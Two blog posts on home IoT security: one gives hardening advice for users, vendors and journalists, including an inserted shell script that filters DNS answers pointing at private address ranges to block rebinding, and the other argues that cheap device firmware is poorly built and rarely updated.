      Most devices are behind an IPv4 NAT device (e.g. a home router), thus cannot be reached from the Internet side by default. Except when the device configures the firewall via UPNP. Or the device has a persistent cloud connection, and the cloud can send commands to the device. Or the device uses IPv6 tunneling (e.g. Teredo), thus it is reachable from the Internet. But not every vulnerability on your home network is accessible directly from the Internet. As more and more devices and networks support IPv6, this scenario might change, but I hope most home routers will come with a default deny configuration in their IPv6 firewall module. On the other hand, scanning for IPv6 devices blindly is not feasible due to the large number of IPv6 addresses, but some tricks might work.

      If attackers cannot access the device directly, there is a way to hack it through the user's browser. Just convince the victim user to visit a website, and via CSRF (Cross Site Request Forgery) and brute-forcing the device IP, it is possible to hack some devices (mostly through HTTP, if the exploit can fit into simple GET or POST requests).

      If attackers cannot attack the device vulnerability through the Internet directly or via CSRF, but have to connect to the same network, the network exposure shrinks significantly. And when attackers are on the same network as you, I bet you have bigger problems than the security of the IoT devices ...

      Recommendations for home users

      Don't buy **** you don't need

      Disable cloud connectivity if it is not necessary. For example I have a NAS device which can be reached through the "cloud", but I have disabled it by not configuring any default gateway for the device. I prefer connecting to my network via VPN and reach all my stuff through that.

      Prevent CSRF attacks. I use two tricks. Don't use the 192.168.0.x - 192.168.10.x network at home; use an uncommon IP range instead (e.g. 192.168.156.x is better). The second trick: I configured the Adblock plugin in my primary browser to block access to my internal network, and I use another browser whenever I want to access my internal devices. Update: On Firefox you can use NoScript ABE to block access to internal resources.

      Check your router configuration:

      • disable UPNP
      • check the firewall settings and disable unnecessary port forwards
      • check for IPv6 settings, and configure the firewall as default deny for incoming IPv6 TCP/UDP.

      Change default passwords, especially for services connected to the Internet. Follow password best practices.

      Run Nmap to locate new IoT devices in your home network :)

      Run a WiFi scan to locate new WiFi access points. Let me share a personal experience with you. I moved to a new house, and brought my own WiFi router with me. I plugged it in, and forgot about WiFi. Months later it turned out I had two other WiFi devices in my house: the cable modem had its own integrated WiFi with default passwords printed on the bottom, and the set-top box was the same, default WiFi passwords printed on the bottom. And don't forget to scan for ZigBee, Bluetooth, IrDA, FM, ...

      Update your devices, in case you have a lot of free time on your hands.

      Don't allow your guests to connect to your home network. Set up a separate AP for them. Imagine your nephew stealing your private photos or videos from your NAS or DLNA server.

      With great power comes great responsibility. The fewer devices you own in your house, the less time you need to spend maintaining them.

      Read the manuals of your devices. Be aware of the different interfaces. Configure them in a secure way.

      Stop being amazed by junk hacking.

      Update: Disable WebRTC: https://www.browserleaks.com/webrtc , in Chrome you can use this extension: https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia

      Update: Prevent DNS rebinding attacks by configuring a DNS server which can block internal IP addresses. OpenDNS can block internal IPs, but this is not a default option; you have to configure it.
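      The following is an added example, not part of the original post and not OpenDNS's code. It shows what the "block internal IP addresses" resolver option above actually does: classify every A answer against the private and local IPv4 ranges and drop the ones a public name should never resolve to, which is the step a DNS rebinding attack depends on. The same classification is what a browser-side LAN block (the Adblock/NoScript ABE trick in the CSRF recommendation) relies on. The answer lines are constructed sample data in the shape dig prints, not real DNS records.

```shell
#!/bin/sh
# Added example, not from the post or from any resolver vendor. A DNS
# rebinding attack first answers a public name with a public address, then
# re-answers it with an address inside the victim's LAN, so the browser
# keeps treating the origin as the same site while requests now reach a
# local device. Refusing answers that point at internal ranges breaks the
# second step. All addresses below are constructed sample data.

# Return 0 when a dotted-quad IPv4 address lies in a range that a public
# name should never resolve to: RFC 1918 (10/8, 172.16/12, 192.168/16),
# loopback 127/8, link-local 169.254/16, "this network" 0/8 and shared
# address space 100.64/10. Anything that is not four octets of 0..255
# (including IPv6 literals) is treated as not matching.
is_internal_ipv4() {
    old_ifs="$IFS"
    IFS=.
    set -- $1
    IFS="$old_ifs"
    [ $# -eq 4 ] || return 1
    for octet in "$1" "$2" "$3" "$4"; do
        case "$octet" in ''|*[!0-9]*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    case "$1" in
        0|10|127) return 0 ;;
        172) [ "$2" -ge 16 ] && [ "$2" -le 31 ] && return 0 ;;
        192) [ "$2" -eq 168 ] && return 0 ;;
        169) [ "$2" -eq 254 ] && return 0 ;;
        100) [ "$2" -ge 64 ] && [ "$2" -le 127 ] && return 0 ;;
    esac
    return 1
}

# Filter resolver answers given as "<name> <ttl> <class> <type> <address>"
# lines. A records pointing at internal addresses are dropped and reported
# on stderr; everything else passes through unchanged.
filter_answers() {
    while read -r name ttl class type addr; do
        if [ "$type" = "A" ] && is_internal_ipv4 "$addr"; then
            echo "blocked rebinding answer: $name -> $addr" >&2
        else
            echo "$name $ttl $class $type $addr"
        fi
    done
}

# Constructed answers: a public address for the attacker's name, then the
# short-TTL rebind into the LAN, a camera on a private range, and an
# unrelated AAAA record that must pass untouched.
SAMPLE_ANSWERS='attacker.example 60 IN A 203.0.113.5
attacker.example 5 IN A 192.168.156.10
camera.example 30 IN A 10.0.0.7
static.example 300 IN AAAA 2001:db8::1'

printf '%s\n' "$SAMPLE_ANSWERS" | filter_answers
```

      Only the two answers with routable addresses survive the filter; the rebind to 192.168.156.10 and the 10.0.0.7 record are reported on stderr. Note that the filter protects names resolved through this resolver only; a device that talks to its own cloud over a hard-coded address, or a browser that uses DNS over HTTPS to a different resolver, bypasses it.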

      Recommendations for vendors

      For vendors, I recommend at least the following:

      • Implement security during Software Development LifeCycle
      • Continuous security testing and bug bounties
      • Seamless auto-update
      • Opt-in cloud connectivity

      Recommendations for journalists

      Stop FUD. Pretty please.

      The questions to ask before losing your head

      • who can exploit the vulnerability?
      • what prerequisites does the attack have to successfully exploit the vulnerability? Is the attacker already in your home network? If yes, you probably have bigger problems.
      • what can the attacker do when the exploit is successful?

      And last but not least, don't forget that in the case of IoT devices, sometimes users are the product, not the customer. IoT is about collecting data for marketing purposes.


      For an Internet of Things, We Are Going to Need Better Things

      There's a lot of hype around at the moment about "The Internet of Things" (IoT), which, I suppose, is all about attaching, uh, things to the Internet. By "things", it seems we are supposed to be thinking household goods, vehicles; basically anything with electrical current running through it is a candidate for the "internet of things".

      While setting up a cheapo DVD player last week, I couldn't help thinking of Chief Brody in the film "Jaws"... "You're going to need a bigger boat", he says, on seeing the enormous shark. We're going to need a bigger mindset on security if we are to survive the onslaught of "things". The firmware in the kind of devices we are already routinely connecting up is drivel. I mean some of it is absolute garbage. I know there are exceptions, but most of it is badly built, and almost none of it is ever updated.

      Each of these devices is likely perfectly capable as a host in a botnet - for DDoS, for sending SPAM, SPIM and SPIT (OK, we are yet to see much in the way of unsolicited Internet Telephony... but with the IoT, devices built to make calls/send texts are likely to get hijacked), so each of these devices has a value to the Internet's vast supply of wrongdoers.

      Researchers at Eurecom recently completed a study showing up vulnerabilities in the 30 thousand or so firmware images they scraped from vendor websites. Apparently one image even contained a Linux kernel whose age had just hit double figures. Ouch. The "Nest" next-gen thermostat hasn't been without issues either; as a high profile target, at least we can expect firmware updates from them!

      Synology's NAS storage devices are among the early victims of malware attacking non-traditional computing devices, and may be an indication of IoT issues to come. Users of these storage devices have found themselves victim of a crypto-ransomware attack: their files are encrypted, and the encryption keys offered for sale back to them! Other early warnings come in the form of attacks on SCADA industrial control systems. These are all places that traditionally, little or no emphasis has been placed on security.

      What can we do to help ourselves here? My advice is to be careful before you buy anything you're going to add to your network. Look to see if the vendor has a firmware download, and if there's a recent-ish update. If they're the fire'n'forget types, you're probably not going to want to deploy it.

      Footnote: Gartner appears to believe the Internet of Things to have reached "peak hype". Reminds me of an old saying about those dwelling in vitreous abodes launching masonry...